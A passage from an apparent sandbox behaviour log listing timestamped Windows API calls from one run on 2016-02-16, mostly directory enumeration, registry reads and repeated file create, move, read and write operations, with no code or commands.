"2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,499", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,509", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,509", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,519", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,519", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,529", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,529", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,539", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,539", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,549", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,549", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,559", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,559", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,569", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,569", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:39,579", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,579", "api": "NtWriteFile"}, {"category": 